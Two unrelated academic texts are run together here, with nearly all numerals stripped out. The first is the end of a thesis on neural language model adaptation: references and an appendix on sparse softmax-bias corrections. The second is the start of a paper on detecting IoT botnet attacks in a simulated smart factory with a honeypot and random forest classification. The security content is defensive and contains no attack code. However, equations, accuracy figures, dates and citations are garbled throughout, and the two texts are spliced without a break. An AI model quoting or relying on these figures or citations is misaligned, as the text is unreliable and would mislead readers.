acl. juncen li, robin jia, he he, and percy liang. . delete, retrieve, generate: a simple approach to sentiment and style transfer. arxiv preprint arxiv: . . bing liu and ian lane. . dialog context language modeling with recurrent neural networks. in proc. icassp, pages – . yi luan, yangfeng ji, and mari ostendorf. . lstm based conversation models. arxiv preprint arxiv: . . min ma, michael nirschl, fadi biadsy, and shankar kumar. . approaches for neural- network language model adaptation. in proc. interspeech , pages – . andrew l maas, ziang xie, dan jurafsky, and andrew y ng. . lexicon-free conversa- tional speech recognition with neural networks. in proc. naacl. gábor melis, chris dyer, and phil blunsom. . on the state of the art of evaluation in neural language models. in proc. iclr. gideon mendels, erica cooper, victor soto, julia hirschberg, mark gales, kate knill, anton ragni, and haipeng wang. . improving speech recognition and keyword search for low resource languages using web data. in proc. interspeech. stephen merity, nitish shirish keskar, and richard socher. a. regularizing and opti- mizing lstm language models. arxiv preprint arxiv: . . stephen merity, caiming xiong, james bradbury, and richard socher. b. pointer sen- tinel mixture models. in proc. iclr. grégoire mesnil, yann dauphin, kaisheng yao, yoshua bengio, li deng, dilek hakkani- tur, xiaodong he, larry heck, gokhan tur, dong yu, et al. . using recurrent neural networks for slot filling in spoken language understanding. ieee/acm transactions on audio, speech, and language processing, ( ): – . tomáš mikolov, anoop deoras, daniel povey, lukáš burget, and jan černockỳ. . strate- gies for training large scale neural network language models. in automatic speech recog- nition and understanding (asru), ieee workshop on, pages – . tomáš mikolov, martin karafiát, lukáš burget, jan černockỳ, and sanjeev khudanpur. . recurrent neural network based language model. in proc. interspeech. tomáš mikolov and geoffrey zweig. . context dependent recurrent neural network language model. in proc. slt, pages – . bhaskar mitra and nick craswell. . query auto-completion for rare prefixes. in proc. cikm, pages – . andriy mnih and koray kavukcuoglu. . learning word embeddings efficiently with noise-contrastive estimation. in proc. nips, pages – . giovanni molina, fahad alghamdi, mahmoud ghoneim, abdelati hawwari, nicolas rey- villamizar, mona diab, and thamar solorio. . overview for the second shared task on language identification in code-switched data. in second workshop on computational approaches to code switching, pages – . frederic morin and yoshua bengio. . hierarchical probabilistic neural network language model. in proc. aistats, volume , pages – . graham neubig and chris dyer. . generalizing and hybridizing count-based and neural language models. in proc. emnlp. miles osborne, ashwin lall, and benjamin van durme. . exponential reservoir sampling for streaming language models. proc. acl. robert östling and jörg tiedemann. . continuous multilinguality with language vectors. proc. eacl. ankur p parikh, avneesh saluja, chris dyer, and eric p xing. . language modeling with power low rank ensembles. in proc. emnlp. dae hoon park and rikio chiba. . a neural language model for query auto-completion. in proc. sigir, pages – . razvan pascanu, tomáš mikolov, and yoshua bengio. . on the difficulty of training recurrent neural networks. in proc. icml, pages – . greg pass, abdur chowdhury, and cayley torgeson. . a picture of search. infoscale, : . ofir press and lior wolf. . using the output embedding to improve language models. in proc. eacl. alec radford, rafal jozefowicz, and ilya sutskever. . learning to generate reviews and discovering sentiment. arxiv preprint arxiv: . . anton ragni, edgar dakin, xie chen, mark j f gales, and kate m knill. . multi- language neural network language models. in proc. interspeech. ashwin ram, rohit prasad, chandra khatri, anu venkatesh, raefer gabriel, qing liu, jeff nunn, behnam hedayatnia, ming cheng, ashish nagar, et al. . conversational ai: the science behind the alexa prize. in proc. nips. nils reimers and iryna gurevych. . reporting score distributions makes a difference: performance study of lstm-networks for sequence tagging. in proc. emnlp. giuseppe riccardi and allen l gorin. . stochastic language adaptation over time and state in natural spoken dialog systems. ieee transactions on speech and audio process- ing, ( ): – . roni rosenfeld. . optimizing lexical and ngram coverage via judicious use of linguistic data. in proc. eurospeech. roni rosenfeld. . a maximum entropy approach to adaptive statistical language mod- eling. computer, speech and language, : – . roni rosenfeld. . two decades of statistical language modeling: where do we go from here? proceedings of the ieee, ( ): – . murat saraçlar, tunga güngör, et al. . morphology-based and sub-word language mod- eling for turkish speech recognition. in ieee international conference on acoustics, speech and signal processing, pages – . sarah e. schwarm, ivan bulyko, and mari ostendorf. . adaptive language modeling with varied sources to cover new vocabulary items. ieee trans. speech and audio processing, : – . holger schwenk. . efficient training of large neural networks for language modeling. in ieee international joint conference on neural networks, volume , pages – . stanislau semeniuta, aliaksei severyn, and erhardt barth. . recurrent dropout without memory loss. in proc. coling. noam shazeer, joris pelemans, and ciprian chelba. . sparse non-negative matrix lan- guage modeling for skip-grams. in proc. interspeech, pages – . milad shokouhi. . learning to personalize query auto-completion. in proc. sigir, pages – . milad shokouhi and kira radinsky. . time-sensitive query auto-completion. in proc. sigir, pages – . manhung siu and mari ostendorf. . variable n-grams and extensions for conversational speech language modeling. ieee transactions on speech and audio processing, ( ): – . alessandro sordoni, yoshua bengio, hossein vahabi, christina lioma, jakob grue simonsen, and jian-yun nie. . a hierarchical recurrent encoder-decoder for generative context- aware query suggestion. in proc. cikm, pages – . martin sundermeyer, ralf schlüter, and hermann ney. . lstm neural networks for language modeling. in proc. interspeech. david talbot and thorsten brants. . randomized language models via perfect hash functions. in proc. acl. jian tang, yifan yang, sam carton, ming zhang, and qiaozhu mei. . context- aware natural language generation with recurrent neural networks. arxiv preprint arxiv: . . trang tran and mari ostendorf. . characterizing the language of online communities and its relation to community reception. in proc. emnlp. bo-hsiang tseng, hung-yi lee, and lin-shan lee. . personalizing universal recurrent neural network language model with user characteristic features by social network crowd- sourcing. in proc. ieee workshop on automatic speech recognition and understanding (asru), pages – . roger cf tucker, michael j carey, and eluned s parris. . automatic language identi- fication using sub-word models. in proc. icassp, volume , pages i– . ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n gomez, lukasz kaiser, and illia polosukhin. . attention is all you need. in proc. nips, pages – . po-wei wang, j. zico kolter, vijai mohan, and inderjit s. dhillon. . realtime query completion via deep language models. in proc. iclr. tsung-hsien wen, milica gasic, nikola mrksic, pei-hao su, david vandyke, and steve young. . semantically conditioned lstm-based natural language generation for spo- ken dialogue systems. in proc. emnlp. tsung-hsien wen, aaron heidel, hung-yi lee, yu tsao, and lin-shan lee. . recurrent neural network based language model personalization by social network crowdsourcing. in proc. interspeech, pages – . stewart whiting and joemon m jose. . recent and robust query auto-completion. in proc. www, pages – . yonghui wu, mike schuster, zhifeng chen, quoc v le, mohammad norouzi, wolfgang macherey, maxim kr̃ikun, yuan cao, qin gao, klaus macherey, et al. . google’s neural machine translation system: bridging the gap between human and machine trans- lation. arxiv preprint arxiv: . . puyang xu, sanjeev khudanpur, and asela gunawardana. . randomized maximum entropy language models. in proc. automatic speech recognition and understanding (asru), ieee workshop on, pages – . dani yogatama, chris dyer, wang ling, and phil blunsom. . generative and discrimi- native text classification with recurrent neural networks. arxiv preprint arxiv: . . dani yogatama, chong wang, bryan r routledge, noah a smith, and eric p xing. . dynamic language models for streaming text. tacl, : – . wojciech zaremba, ilya sutskever, and oriol vinyals. . recurrent neural network reg- ularization. arxiv preprint arxiv: . . matthew d. zeiler. . adadelta: an adaptive learning rate method. arxiv preprint arxiv: . . weinan zhang, ting liu, yifa wang, and qingfu zhu. . neural personalized response generation as domain adaptation. arxiv preprint arxiv: . . xiang zhang, junbo zhao, and yann lecun. . character-level convolutional networks for text classification. in proc. nips, pages – . arkaitz zubiaga, inaki san vicente, pablo gamallo, josé ramom pichel campos, iñaki alegŕıa loinaz, nora aranberri, aitzol ezeiza, and vı́ctor fresno-fernández. . overview of tweetlid: tweet language identification at sepln . in proc. tweetlid@ sepln, pages – . appendix a sparse corrections for output layer adaptation in chapter , we saw that adapting the output layer using a low rank term combined with a hash table that stored coefficients for individual words was helpful. the low rank term exploits similarities between contexts to boost the probability of words when appropriate. we hypothesized that there may be certain words that are unique to a particular context and are not well modeled by a low rank adaptation. the purpose of the hashed coefficients was to serve as a correction term to the low rank adaptation. in this appendix, we investigate a sparse correction term, where sparsity is achieved by using an l penalty during training, as an alternate method of modeling exceptions to the low rank adaptation. a. sparse plus low-rank softmax bias adaptation we test two methods of forming embeddings for low rank adaptation of the output layer. one is to use a neural network as in equation . to make a single embedding that summarizes all context variables. the second method is to learn individual embedding matrices for each of the n context variables. in this case equation . is replaced with yt = softmax(e tht + n∑ i= gici + b ), (a. ) which has individual adaptation terms for each context variable. the sparse correction to the low rank adaptation bias has a similar form except that the low-dimensional context embeddings, ci are replaced by one-hot encoded vectors, oi. yt = softmax(e tht + n∑ i= gici + n∑ i= aioi + b ), (a. ) the ai matrices will have a rank equal to the cardinality of the i-th context variable and therefore are much larger than the gi matrices whose rank is set by the dimensionality of ci. to encourage sparsity in the ai matrices we apply a soft threshold operator: u(s,λ) =   s + λ s < −λ −λ ≤ s ≤ λ s−λ λ < s (a. ) this has the identical effect as introducing an l penalty term in the objective except that it sets coefficients to be exactly zero if they are within a certain range. during tuning we search for the optimal penalty term λi for each of the four context variables. the soft thresholding operation u(aioi,λi) is applied (the function is applied element-wise to each entry in aioi). we make use of the same tripadvisor data from chapter except that instead of using two context variables (hotel identifier and review sentiment), we have four: hotel identifier, month of stay, year of stay, and region. there are , hotels, years (from to ), months, and regions (major cities in the united states). we hypothesized that the more detailed context would have more specialized language, which might have more potential to benefit from sparse correction. because of the success with the hash table, we hypothesized that sparse terms would be most useful at the output layer. thus, we use no adaptation at the recurrent layer for the following experiments. the vocabulary size is fixed to , words ( % the size of the one used on the same data in chapter ) so that the model can be trained quickly using a full softmax loss. using a sampled softmax loss may interfere with the application of the added regularization term on the softmax bias vector. we trained models using a random search strategy for hyperparameter tuning. all models used a fixed word embedding and gru dimension of and a batch size of . using a smaller gru dimension, as we did here, places more importance on the softmax layer and gives the adaptation a better chance of having an impact. the hyperparameters that varied between models were the dimensionality of the embeddings of the four context variables, lr sparse ppl no no . yes no . no yes . yes yes . table a. : perplexity on the validation set of models with no adaptation and varying soft- max adaptation strategies. results are not comparable to those in chapter because of a difference in vocabulary size. the λ’s for each context variable, and whether to use or disable each of the two forms of adaptation. for a model that uses no low-rank adaptation, the sparse matrix used to adapt the bias for the region variable contains million parameters, % of the total. this is intended to be over-parameterized so that the regularization will be useful. all of our results are on the validation set and not the test set. as seen in table a. , the best model used a low rank adaptation and no sparse correction. in theory, including the sparse correction should be no worse than without it as long as the λ’s are properly tuned. the fact that performance was worse for the low-rank case indicates that more experiments are needed for proper tuning. among the models that did use a sparse correction term, we found that the models that worked best had λ’s equal to or so close to zero that the regularization had no effect. there was no apparent benefit to having an l penalty on this data set with this size of model and vocabulary. a second finding is that using separate embeddings for each context variable as in equa- tion a. is better for adapting the softmax layer than combining them using a neural network hidden layer as in equations . and . . the difference was small (perplexities of . ver- sus . ) but consistent. this indicates that the optimization of the context embedding parameters could be improved. in predictive text applications, language models are used to suggest the next words that someone might want to type in order to speed-up the process of typing on a mobile device. the top- next word prediction accuracy as a metric is a better fit to this task than perplexity. we computed the top- accuracy for the language models used in these experiments and found that using the “sparse” adaptation strategy had a bigger impact on the accuracy than perplexity. the best model had a top- accuracy of . % and used both low-rank and sparse adaptation compared to . % for the best model using only low rank adaptation. the difference is small but significant (p < . ). a. l penalty for bias layer fine-tuning we mentioned model fine-tuning as a type of adaptation in section . . . in this section we test if including an l penalty on the bias term is helpful when fine-tuning a pre-trained language model to match the style of a small set of data from another domain. we created small datasets for fine-tuning by selecting the subset of tripadvisor reviews that mention the word “hilton” and those that are for hotels in boston. a third dataset was created by selecting a random subset of (mostly restaurant) reviews from the yelp dataset and then a fourth used only the reviews from the yelp dataset that were for a dentist office. for the pre-trained model, we used the best unadapted tripadvisor model from section a. . the fine-tuning was done by continuing training of that model on the new smaller dataset until it began to over-fit. in a realistic scenario there would not be a large validation set available to check for over-fitting but in this experiment we are just aiming for a proof- of-concept. we tried selectively freezing layers of the pre-trained model and also varied the size of the training data and the scale of the l penalty. in each case the best result was obtained by using zero penalty and early stopping as the only regularizer. it is not actually sparse because the weight on the l regularization term was near zero. a. summary after conducting these experiments we were unable to find a benefit from using an l penalty term to learn a sparse correction to a low-rank model in adapting the softmax bias. there are multiple possible explanations for this negative result. • it is possible that the data we used is not the right one for this technique. if we had used another dataset where the size or vocabulary was different then it is possible that having a sparse correction would be helpful. • our use of random search for tuning the regularization penalties could be improved. we might have seen a different result with better tuning. • we purposefully created a model that was over-parameterized. over-parameterization can lead to over-fitting unless regularization is used. using the l penalty is equivalent to setting a laplacian prior distribution on the parameters. the regularization encour- ages the parameters to not be too far from zero on average. however, even without regularization, the parameter values do not grow too large during any practical length of time. the training data constrains the parameter values in the bias from becom- ing too large in the positive direction and. for the negative direction, the bias terms for words that are never used for particular contexts do not reach negative infinity in because their gradients decrease exponentially faster than the parameters themselves. it turns out that stopping gradient descent after a finite amount of time is a more effective means of regularizing the parameters than applying an l penalty. • we hypothesized that sparse corrections would be most useful at the softmax layer, but it is possible that they are helpful at the recurrent layer or for adapting the word embeddings. • we assumed that not adapting the recurrent layer would give the sparse softmax bias adaptation a better chance of success. it is possible this assumption is incorrect and that having a sparse correction is only helpful after the low-rank component has been accounted for by adapting the recurrent layer. in summary, we did not find a use for l regularization for adapting the softmax bias vector. more work is needed to confirm these experiments and to understand why. classification of botnet attacks in iot smart factory using honeypot combined with machine learning classification of botnet attacks in iot smart factory using honeypot combined with machine learning seungjin lee, azween abdullah, nz jhanjhi and sh kok school of computer science & engineering, taylor’s university, subang jaya, selangor, malaysia abstract the industrial revolution . began with the breakthrough technological advances in g, and artificial intelligence has innovatively transformed the manufacturing industry from digitalization and automation to the new era of smart factories. a smart factory can do not only more than just produce products in a digital and automatic system, but also is able to optimize the production on its own by integrating production with process management, service distribution, and customized product requirement. a big challenge to the smart factory is to ensure that its network security can counteract with any cyber attacks such as botnet and distributed denial of service, they are recognized to cause serious interruption in production, and consequently economic losses for company producers. among many security solutions, botnet detection using honeypot has shown to be effective in some investigation studies. it is a method of detecting botnet attackers by intentionally creating a resource within the network with the purpose of closely monitoring and acquiring botnet attacking behaviors. for the first time, a proposed model of botnet detection was experimented by combing honeypot with machine learning to classify botnet attacks. a mimicking smart factory environment was created on iot device hardware configuration. experimental results showed that the model performance gave a high accuracy of above %, with very fast time taken of just . ms and false positive rate at . using random forest algorithm with weka machine learning program. hence, the honeypot combined machine learning model in this study was proved to be highly feasible to apply in the security network of smart factory to detect botnet attacks. subjects computer networks and communications, data mining and machine learning, real-time and embedded systems, scientific computing and simulation, security and privacy keywords smart factory, machine learning, honeypot, botnets detection, iot introduction the industrial revolution . has brought a great innovation to the conventional manufacturing into the new era of smart factories (oztemel & gursev, ). the conventional factories involve automation or digitalization within each production process. this, however, make it very difficult to manage the entire production chain from general to specific levels. more innovatively, smart factory can effectively manage many processes in the production chain thanks to the use of many internet of things (iot) devices. they are installed and interconnected with each other in every machine or equipment along the production chain. hence, a smart factory is advantageous in how to cite this article lee s, abdullah a, jhanjhi n, kok s. . classification of botnet attacks in iot smart factory using honeypot combined with machine learning. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted december published january corresponding author seungjin lee, leephael @gmail.com academic editor muhammad tariq additional information and declarations can be found on page doi . /peerj-cs. copyright lee et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:leephael @�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ producing a variety of products according to customer's desire at better quality and higher productivity. also, iot devices/equipment play a very important role in the operation and management of smart factories. a demand for the iot equipment in smart factories has been increasing since as shown in fig. . especially in the last years ( – ), the use of iot devices has increased tremendously from . billion to billion for application in the smart factories (smith, ). additionally, as smart factories are combined with information and communications technology (ict), all the facilities and devices are connected at the central wireless communication. this allows data to be freely linked between the processes and provides a more systematic, integrated and optimal production environment. efficiency in time management for production can be greatly enhanced with a minimal production cost. therefore, products produced by smart factories become more competitive in the market. although iot smart factories have been built and operated in the industry, standards of implementation for smart factories have yet to be established (guo et al., ). basically, a smart factory consists of three aspects, that is, interconnection, collaboration and execution, which all attribute to the manufacturing conceptualization of being adaptive and flexible (jiafu et al., ). this concept is reflected in the architecture of the smart factory operating on iot system as shown in fig. (chen et al., ). with four layers arranged hierarchically, it starts at the physical resource layer, followed by the networking layer and the application layer, and ends at the terminal layer. a manufacturing system in the smart factory can be assessed from different layers (li et al., ). with the aim of transforming conventional factories into smart factories, in-depth research needs to look into all layers. from the security perspective, research should focus more on the physical resource/ sensing layer, as it is directly related to the vast usage of the iot devices in order to reinforce the security network for smart factories. finding any security-related issues is one of the priorities required for a smooth system operation by means of resolving any figure demand for iot equipment. the use of iot equipment that is increasing every year. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ failover problems arising from the entire manufacturing chain (mittal et al., ). especially, the iot devices are such as radio-frequency identification (rfid), cctvs, programmable logic controller (plc) equipment, sensor and main database servers are installed or located at the physical resource layer. data transmission between these iot devices can be easily affected in case that data leakage in smart factory network occurs. in the worst case, data updates can be abused by unauthorized users (ramos, monge & vidal, ). to mitigate the impact of data leakage and data abuse, real-time detection of cyber attacks to smart factory obviously becomes an extremely important factor to take into consideration of developing and improving security network of the smart factory (brett et al., ). network security in the smart factory is highly at risk of being under cyber attacks due to the interconnection of a huge number of iot equipment. according to a recent report, instability is recognized as one of the biggest limitations out of vulnerable features found in the iot devices (casalinuovo, ). as a result, cyber attack to smart factories can easily spread to not only quality process control and production control, but also product design which can be analyzed or copied by unauthorized or illegal accesses. in the worse scenario, highly confidential information such as process know-how, requirements figure function requirements of smart factory. features for each layer are shown. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of data analysis, product design drawings, r&d results are shared outside of the smart factory. such threats of information leakage can cause serious damages and economic losses to both manufacturing and business sectors. this kind of cyber attack can be done by the act of exploiting security vulnerabilities in the ict system via remote control or surveillance of systems in the iot smart factory. one of the most serious cyber attacks to smart factory is botnet. an example of the botnet attack is a temporary unavailability on some commercial websites such as amazon, netflix, twitter, cnn and paypal. a notable case ever recorded is the attack on the dyn dns infrastructure, which mobilized , iot devices (mainly cctv cameras) in october . another example is the new mirai-source-code being launched in . these mirai-induced iot botnets have occurred frequently in the recent years with a very serious consequence. therefore, it is very important and urgent to identify and mitigate iot botnets through the development of new technologies for network security (ozcelik, chalabianloo & gur, ). as the number of attacks has soared due to unstable iot devices in the internet infrastructure, smart factories undoubtedly are highly possible to become an ideal victim of the iot botnet attack. among many detection methods, honeypot has been investigated to apply for detecting botnet attack in various studies in the recent years (ja’fari et al., ). however, a huge volume of attacking data collected by honeypot is highly complex and non-classified. this causes to lower the efficiency of botnet detection by the honey method in term of time taken and accuracy. in order to improve the efficiency, it is crucial to focus on classifying botnet attacking information and obtaining botnet attacking behaviors (intrusion type in other words). in this particular area of dealing with big data, artificial intelligence or machine learning has recently been applied effectively to speed up data processing, and make prediction as well as detection (seungjin, abdullah & jhanjhi, ). hence, it becomes very potential to apply machine learning for botnet classification, which is notably yet to be investigated in previous studies, especially in the smart factory environment. therefore, this study was aimed to investigate the feasibility of combining honeypot with machine learning in developing a botnet detection model for iot smart factories. in this work, a configuration of hardware representing a physical layout of a smart factory was built and installed with software of honeypot combined machine learning. the whole setup was then programed to run for simulation to detect and classify botnet attacks into intrusion types. problem statement the problem statement can be elaborated with following points: � a huge amount of attacking data collected by honeypot is highly complex. � without data classification, efficiency of the honeypot model is low, since the current time taken is long but at low accuracy to detect botnet. � a very limited number of studies focused on botnet detection for the smart factory. � strategy of using honeypot with machine learning has been suggested very recently with only study framework and lack of model verification for supporting. lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ study approach � apply machine learning as a supporting tool for classifying botnet attacks captured in log files generated by honeypot. selection of random forest algorithm for machine learning to improve the classification process. model testing on a hardware configuration mimicking a real smart factory environment. related work various botnet detection methods and their rationale are described in the taxonomy in fig. . besides, a smart factory is layered into the perception (physical), communication, network, data and applications with the function of each, as shown in the following taxonomy of the same figure. comparison of various detection models are presented in table . real-time detection is a very important factor which smart factories seek for katz, piantanida & debbah ( ). � honeypot can respond to attacks in real time and attract attackers to deceptive assets instead of actual assets (duessel et al., ). whereas for binary, anomaly detection methods, the response to real-time is however slower than that of the honeypot method (gerstmayer et al., ; fenzl et al., ). figure taxonomies for botnet detection and security layers of iot smart factories. the combi- nation of honeypot detection with the perception layer is shown. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � binary detection is simple in the structure of using and . but its detection processing speed is too low to be compatible to smart manufacturing environment which seeks real- time detection (katz, piantanida & debbah, ) � although the command and control (c&c) method targets for http-based botnet detection and expansion, its structure is not simple to implement and the detection result is high false-positive (fedynyshyn, chuah & tan, ). � in terms of cost effectiveness, honeypot has an advantage since it requires a relative low cost of construction and management (aziz, ). with an increasing interest in the potential application of machine learning, it offers a new solution for detecting abnormalities in the malicious internet traffic. in fact, the internet traffic which allows communication between iot devices is distinguished from the internet connectivity which runs on a variety of web server many internet-connected devices are such as smartphones, computer, laptops using a variety of web servers. moreover, for the iot devices, patterns of the network traffic are repeated in the regularity of network ping with small packets for logging. applying machine learning in botnet detection for smart factories can become useful to enhance performance of the honeypot model in term of speeding up the processing time or detection time (lim et al., ). interestingly, there have been very few studies making attempts to mount both honeypot and machine learning on iot device networks to target attacks on the iot traffic. table summarizes a few studies in botnet detection using the approaches of honeypot and/or machine learning. � iot botnet detection is an approach used to design a detection model based on the binary when botnet attacks iot device as a hypothesis (choi, yang & kwak, ). although monitoring algorithms for the infected iot device are simple and easy through web services, capacity of the iot devices has certain limits as a restriction in the iot botnet detection. � another approach to detect botnet is using machine learning which gave a high accuracy in detection at . % (wang et al., ). however, one disadvantage of using machine learning approach is that fast detection is hard to achieve in the randomized number of packets. consequently, the feasibility of applying this approach for smart manufacturing needs more research looking into real-time factor and accuracy. � botnet detection using honeypot integrated with iot, named as iot honeypot was studied in the environment of smart factories (dowling, schukat & melvin, ). in comparison with the machine learning approach by wang et al. ( ), the iot honeypot approach is able to gather information at high speed with less resource consumption (jiafu et al., ). although the iot honeypot approach has been shown to be scalable by applying it to sandboxes iot to support high protocols, more expansion in various situations and environments is needed with features to activate the architecture of the iot devices (jiafu et al., ). lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � one study suggested to apply machine learning to detect botnet in the smart factory environment (park, li & hong, ). on the one hand, the machine learning approach can reduce the cost as an advantage. on the other hand, low detection rate and high complexity and uncertainty are recognized as big limitations. thus, it might not suitable for smart factories, unless a construction of machine learning with kenta-aware intrusion tower system is built, which bears an additional cost. � advancing from the iot honeypot approach and the machine learning approach, honeypot combined with machine learning named as honeypot machine learning uses learning logging for detection and tracking at high accuracy (vishwakarma, ). in accordance with most standard equipment at various functions, the honeypot machine learning approach is suitable for the performance of smart factory with a minimal resource required. hence, it is likely to be adopted in the future (vishwakarma, ). among those approaches being discussed, iot botnet and honeypot machine learning approaches shows some effective results in detecting botnets. these two approaches are possible to trace through logging at low cost and are most cost-saving for the iot devices. notably, feasibility of applying the honeypot machine learning approach in the smart factory especially has yet to investigate in any studies so far as being highlighted in the recent review work (seungjin, abdullah & jhanjhi, ). therefore, more research in botnet detection should look insight into this particular area for application in smart factory. materials and methods proposed model this section is organized to focus on three main aspects. the first and second aspects mention configuration and simulation of hardware in a virtual smart factory environment. the last aspect presents algorithms of the honeypot detection model in combination with machine learning programing. configuration of hardware for a virtual smart factory environment in the configuration setup, some iot devices (camera, rfid, temperature sensors) and two raspberry pie devices (pi and pi ) were used to create a virtual smart factory environment. the first raspberry pi (pi ) was assigned as the actual main iot data collection server by installing open cvs. it was responsible for transmitting collected iot data to the main pc. t-pot platform was chosen because it was suitable for virtual experiments using raspberry and allowed to monitor real-time botnet detection through dashboards. the second raspberry pi (pi ) was installed with a virtual server (vm) (t-pot platform) so that collection of detection information in such the environment was deliberately established. one assumption was that botnet attacked the raspberry pi (honeypot server) using feature botnet datasets. raspberry pi and pi were installed on a log server to lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ keep the information on iot product line in the factory and records of botnet attack pattern time zone, making it easy to track. operating mechanism of the honeypot combined machine learning model in smart factory is illustrated in fig. . when an attacker attempted to inject a malicious code through an open port. this step was done by logging into an iot device at the physical resource/perception layer by combining multiple ids and passwords. the honeypot intentionally broke into his protective wall and came in as a person who could reach the attacker. the main intention was to obtain information about attackers and malicious code botnets by recording each activity between the device and the intruder in the form of a log file. these log files captured information that allowed administrators to identify characteristics, transformations, target device types, c&c server ip addresses, port numbers of the new malware suites or botnets. log file data was then converted to an appropriate table format that can be used as a dataset. table a comparison of studies in botnet detection using honeypot and/or machine learning approaches for smart factories. approaches strengths weaknesses research gap refs. machine learning for smart factory environment cost reduction detection rate is very low and the accuracy is low. the system is complicated building machine learning and kenta-aware intrusion tower systems for information that will be leaked from manufacturing processes park, li & hong ( ) iot botnet monitoring web-based real- time iot equipment. easy and simple interface limited capacity new optimization requires expansion of utilization choi, yang & kwak ( ) machine learning . % graph-based detection accuracy difficult to apply flow-based detectors a graph-based bot mark is required to increase the accuracy of botnet detection wang et al. ( ) iot honeypot speed of gathering information is fast. less resource consumption. unnecessary data piles up it is necessary to activate network protocol by expanding iot equipment and sandbox jiafu et al. ( ) honeypot machine learning real-time monitoring with the combination of honeypot and machine learning it is greatly affected by the system environment problems with device data capacity cloud server application vishwakarma ( ) table comparison of honeypot with other detection methods. honeypot binary detection anomaly detection c&c detection configuration high-interaction virtual server binary p p command & control server advantages monitor the interaction of the grid with infected devices user friendly ui system easily applicable to multi- connection systems systems have the capability to detect zero-day attacks as well able to detect and expand http-based botnets. disadvantages the analysis of information on an attack is slow and passive spend a lot of time training not simple structure high false-positive not simple structure high false-positive (zhang et al., ; duessel et al., ) (gerstmayer et al., ) (fenzl et al., ) (fedynyshyn, chuah & tan, ) lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a machine learning (ml) tool was then trained with the dataset which contained network parameters. these parameters were based on the most common features of iot botnet attacks to smart factory reported in the previous work studying in network architecture and network type used in the physical layer of smart factory, smart home network and smart city (fan et al., ; almusaylim & zaman, ; humayun et al., ). algorithm written for this ml tool classified botnet data using r-studio and weka. memory-efficient classification was desirable to predict useful information by using less training data to prevent iot devices from becoming overwhelming. afterwards, appropriate measures were taken according to the results of the classification. whenever the course exceeded the allowed size of training data, it would dynamically repeat. figure operating mechanisms of botnet attacks to the physical sensing layer of a smart factory and design of the honeypot combined machine learning model. botnet detection by the honeypot at the physical layer is shown. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ simulation of hardware design with raspberry pi transfer log files each product in the smart factory was attached with a radio-frequency identification (rfid) tag containing information. camera reads the rfid tags to collect product information. the collected information was then stored in the raspberry pi and pi as the calling terminals. in other words, it was programed to transmit the collected data to the iot service server of the network through a terminal (camera, temperature, and rfidiot devices). the information kept in pi and pi as a log file was then transferred to the server of the main pc. this process simulation is illustrated in fig. . raspberry pi setting: data transporting open cv transporting and receiving of data in this virtual environment were similar to those taking place in the real smart factory. data transporting open cv was used as a collection of python classes that transferred open cv images and data from the raspberry pi to the main computer via data transporting open cv messages. for example, on the main computer screen, video and picture streams were shown simultaneously by sending signal data of raspberry pi as shown in fig. . algorithm was required for the main pc and raspberry pi for such data transfer as shown in table . raspberry pi setting: t-pot honeypot platform after raspberry pi setting with data transporting open cv, raspberry pi was set with t-pot honeypot platform followed by virtual machine (vm). verification and testing were figure simulation of hardware design. the collection of product information by raspberry pi is shown. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ done on all the honeypot to be balanced at runtime. to do this task, a studio state command line was used to write script and verify the transmission of log file. the script in fig. shows the load on the platform, the status of each honeypot, and the uptime. furthermore, the data collected by the honeypot was visually displayed using the kibana dashboard showing network attacked by malicious users and botnet. the kibana dashboard shown in fig. is convenient and comprehensive for analysis of the type, location, and malicious threat actors of botnet attacks. it infiltrated the raspberry pi server inside the vm. this had many potential uses for data systems and metrif collection in smart manufacturing environment that required real-time monitoring. honeypot and machine learning classification process design and algorithms diagram in fig. describes the process design for botnet detection by honeypot combined with machine learning classification model. the entire process consisted of two stages. in the first stage (honeypot simulation), it took place at the raspberry pi server which finished its loading by checking botnet credentials and then started the honeypot detection in the t-pot platform. to verify botnet credentials in this step, a user name and password must be provided. accurate information given by authorized users would be proceeded to start honeypot detection. the verification step took approximately s. figure raspberry pi image transfer data. captured data by iot camera. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table algorithm of data transfer in raspberry pi . algorithm: raspberry pi image data transfer . input: list of data transfer . output: pi image data (task mapped to vm) . begin . true: cv, vm. show streamed images and data . if . two tasks get data from rfid, image, signal then . pick task with earliest . else . transfer data . while vm . compute utilization . sent image, signal each . repeat if data is available & task allocated then . migrate task to less utilized data . else . start scheduling . until all send images as stream . image = pi cam read . end figure t-pot test script for raspberry pi 